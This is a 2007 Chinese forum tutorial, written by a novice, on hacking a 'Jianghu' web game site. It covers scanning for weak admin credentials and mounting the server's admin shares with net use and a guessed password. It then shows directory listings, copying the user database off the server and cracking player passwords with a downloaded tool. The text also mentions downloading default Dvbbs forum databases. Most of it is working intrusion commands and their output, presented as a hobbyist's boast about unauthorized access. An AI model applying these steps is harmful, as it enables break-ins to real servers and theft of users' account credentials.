站长论坛 站长下载

下载江湖数据库

　 2007年10月15日03:55:55　 评论(0条) 字体:[大 中 小]
相关热点：

最近网上流行江湖，玩江湖的朋友都会找一些工具或者漏洞来提升自己的等级。有些网友也会到我的论坛发表疑问，可我是菜鸟级人物，要深入探讨江湖漏洞还为时尚早，昨天我用IPC进入一个江湖网站后把他的数据库下载了，从中得到一些心得，不敢独享，拿出来让您见笑了：）
好，废话少说，开始讲讲我的下载过程。
首先我用小榕的流光扫描这个江湖网站，得到了一个IPC的ADMIN组的用户名和密码。
假设这个网站IP为192.168.100.1 用户为administrator 密码为123
用net命令进入
net use \\192.168.100.1\ipc$ “123” /user:administrator
提示命令成功完成
dir \\192.168.100.1\c$
进入他的C盘
一般网站存放的默认路径都会在inetpub\wwwroot目录下，但很多网站都不是如此，这样我们就要查找他的存放目录了！
可以用 dir \\192.168.100.1\c$\文件名 /s 来查找，文件名可以在网站上任意一个文件，如图片来查找，可以用鼠标右击选择属性来得到图片的文件名：）因为我们要查后缀名为.mdb的数据库文件，所以也可以用dir \\192.168.100.1\c$\*.mdb /a/s 来查找。
呵呵，这个网站的文件备份工作还是做的不错的，害我查了半天，最后得到他的江湖文件在d$\ftp\koing\xajh里。
C:\>dir \\192.168.100.1\d$\ftp\koing\xajh\
驱动器 \\192.168.100.1\d$ 中的卷没有标签。
卷的序列号是 D03E-DD81
\\192.168.100.1\d$\ftp\koing\xajh 的目录

2001-11-05  21:27      

         .
2001-11-05  21:27                ..
2001-06-28  01:57               15,193 1.mid
2001-04-22  17:11               43,389 122.mid
2001-10-24  07:28                adminbz
2001-07-10  22:27              518,566 adminbz.rar
2001-06-25  19:41               68,851 an.txt
2001-06-27  04:46                3,405 ao.asp
2001-11-29  00:01                bao
2001-07-10  22:30               13,704 bao.rar
2001-10-24  07:28                bet
2001-06-07  22:18                2,467 bombsee.asp
2001-10-24  07:28                cao12387
2001-10-24  07:28                chat
2001-10-05  00:02                9,663 check.asp
2001-10-01  08:52                  200 chszsj43.chh
2001-06-07  22:24                1,921 close.asp
2001-06-07  22:24                4,736 closeme.asp
2001-06-08  21:57                  327 conn.asp
2001-06-08  21:57                  615 conn1.asp
2001-12-09  10:12                cp
2001-10-24  07:28                css
2001-06-06  10:49                  926 css.css
2001-06-07  22:18                2,539 daibuse2e.asp
2001-06-07  22:19                1,935 dajiasee.asp
2001-12-09  10:52                data
2001-06-08  21:57                  378 data.asp
2001-06-07  22:19                  328 data1.asp
2001-06-07  22:19                4,020 data2.asp
2001-10-24  07:27                dati
2001-11-05  21:41                dc
2001-10-11  07:38               10,355 default.asp
2001-06-28  21:02                8,010 default000.asp
2001-06-27  03:21                7,176 default00000.asp
2001-10-01  14:11                4,434 default328.asp
2001-08-05  07:28                4,427 defaultold.asp
2001-10-24  07:27                dg
2001-06-07  22:19                1,919 disp.asp
2001-06-30  04:34               16,093 error.asp
2001-09-17  21:27                2,495 exit.asp
2001-06-07  22:19                  509 fun.inc
2001-10-06  15:27               50,904 func.asp
2003-09-15  01:06               27,997 g.gif
2001-06-13  20:11                7,195 Global.asa
2001-06-07  22:19                2,608 guanfu.htm
2001-11-19  23:48                guanli
2001-06-07  22:19                2,550 guanlisee.asp
2001-12-09  10:19                gupiao
2001-10-24  07:27                hcjs
2001-12-09  10:44                hunyin
2001-10-24  07:27                imagejh
2001-10-24  07:27                images
2001-10-24  07:27                img
2001-07-05  21:09               13,960 java.txt
2001-10-24  07:27                jh
2001-12-07  00:08               24,805 jh.asp
2001-06-07  22:19                  247 jh.css
2001-06-28  21:02               27,325 jh0.asp
2001-06-28  21:02               27,325 jh10.asp
2001-07-05  21:03               10,211 jh2.asp
2001-06-07  22:19                3,348 jhb.mid
2001-11-19  23:11                jhmp
2001-06-07  22:19                2,545 jianjinsee.asp
2001-12-09  10:39                jiaoyou
2001-06-07  22:20                2,446 jinggaosee.asp
2003-09-14  18:48                2,109 joe.js
2001-06-07  22:20                4,240 joinchat.asp
2001-06-07  22:20                2,263 ku.asp
2001-10-24  07:27                laiya
2001-06-07  22:20                  257 login.asp
2001-11-07  13:16                lsm
2001-10-24  07:27                midi
2001-10-24  07:27                myhome
2001-06-07  22:20                    0 new.css
2001-06-07  22:20                  530 NEW2.CSS
2001-06-07  22:20                3,394 ok.asp
2001-10-24  07:27                ok1ok
2001-06-07  22:20                  510 online.asp
2001-12-09  10:49                quest
2001-06-07  22:20                1,612 readme.htm
2003-09-14  19:09                  805 s.css
2001-06-08  21:57                3,764 set.asp
2001-06-07  22:20                  623 setup.css
2001-06-07  22:20                2,509 setwg3.asp
2001-06-07  22:20                  322 showimg.asp
2001-07-09  14:30                    0 showuser.asp
2001-10-24  07:27                street
2001-06-07  22:20                  464 style.css
2001-06-07  22:20                  515 style1.css
2001-12-09  06:36                sy
2003-09-15  01:19               31,744 t.fla
2003-09-15  01:09                9,150 t.swf
2001-06-28  01:55               12,485 tiandadd.mid
2001-10-24  07:27                top
2001-07-05  20:28                4,165 txt.asp
2001-07-09  14:50                2,190 txt.gif
2001-12-07  00:11                1,770 whatnew.asp
2001-10-24  07:27                work
2001-06-07  22:24               12,670 xajh.gif
2001-06-07  22:20                2,024 xg.asp
2001-10-24  07:27                yamen
2001-10-24  07:27                zjj
2001-06-07  22:20                2,354 zuolaosee.asp
         68 个文件      1,054,516 字节
         35 个目录  2,743,296,000 可用字节
数据库文件在哪呢？呵呵，虽然我不懂英语，但data这单词还是懂的：）
C:\>dir \\192.168.100.1\d$\ftp\koing\xajh\data
驱动器 \\192.168.100.1\d$ 中的卷没有标签。
卷的序列号是 D03E-DD81

\\192.168.100.1\d$\ftp\koing\xajh\data 的目录

2001-12-09  10:52      

         .
2001-12-09  10:52                ..
2001-07-09  18:31                    0 dag364.TMP
2001-07-09  18:30                    0 dagF2C4.TMP
2001-12-09  10:51              167,936 jilu.mdb
2001-12-09  03:46              397,312 kill.asa
2001-12-09  10:52           31,461,376 user.asa
2001-12-09  10:52                    0 user.ldb
2001-08-09  18:34              990,176 用户
          7 个文件     33,016,800 字节
          2 个目录  2,743,296,000 可用字节
江湖数据库的一般都是以Access形式保存的，后缀名为.mdb，是可以下载的。现在的一些ASP制作的论坛也是如此，只要我们知道数据库的绝对路径我们都可以下载到硬盘，然后查看超级管理员的帐号和密码，不如动网论坛的数据库默认存放路径是bbs/dv3sr2.mdb 很多网站都没有修改，笔者也曾经成功下载了几次动网的数据库：）在此我建议大家直接把数据库的后缀名改成.asp这样也照常浏览，却不能下载了~！
好，现在我们看看文件有jilu.mdb、kill.asa、user.asa 这三个文件，我首先下载jilu.mdb文件，在IE地址栏输入192.168.100.1/xajh/jilu.mdb 呵，成功下载回来，打开文件（首先必须安全OFFICE 2000里的Microsoft Access）哎呀，竟然不是，再看看user.asa 呵呵，这不是用户文件吗？容量很大，刚好符合！试试能不能下载输入 192.168.100.1/user.asa 昏，系统提示出现500错误！
怎么办？我不知怎么就认定这个文件一定就是（虽然我并不知道.asa文件是做什么的）
网友提点我可以把文件影射到本地来啊。
命令是:net use x: \\192.168.100.1\d$
这下他的D盘就变你的X盘了。
也可以用copy \\192.168.100.1\d$\ftp\koing\xajh\data\user.asa c:
这样就直接把文件COPY到你的C盘了：）
而笔者是用网上邻居的方法进入的
点击网上邻居——>添加网上邻居，在请键入网上邻居位置上打上网址：\\192.168.100.1\d$\ftp\koing\xajh\data\ 点完成。
呵呵，看见文件了，把他复制到本地硬盘来就行了！
好久，30M呢，还好是小江湖，我可是“猫网”，555~~~
下载后把他的后缀名改成.mdb，打开，呵呵，出来了！
看，全部注册信息——昏~~~怎么密码全象是乱码？？好象是加密了？5555~~~我下载了那么久啊！！想想好象前不久看见有个叫ASP江湖密码解密机的！下载后把数据库里的密码复制了如果放在“加密后的密码”选项里，点“解密”呵呵，真密码出来啦~~
ASP江湖密码解密机在本站有下载
地址_blank href=http://www.my87135.com/freehome/zyym/down/download.asp?Did=1839>http://www.my87135.com/freehome/zyym/down/download.asp?Did=1839
文件大小：10K （好小）
好了，文章到此结束。
小弟以前都在学网页设计，如今初学这玩意，还有很多不懂的地方需要各位前辈来指点与教导！此次由于我命令不熟悉，害我走了许多弯路，该拿起书本好好背命令了。
作者：幽冥
e-mail:lizihao@21cn.com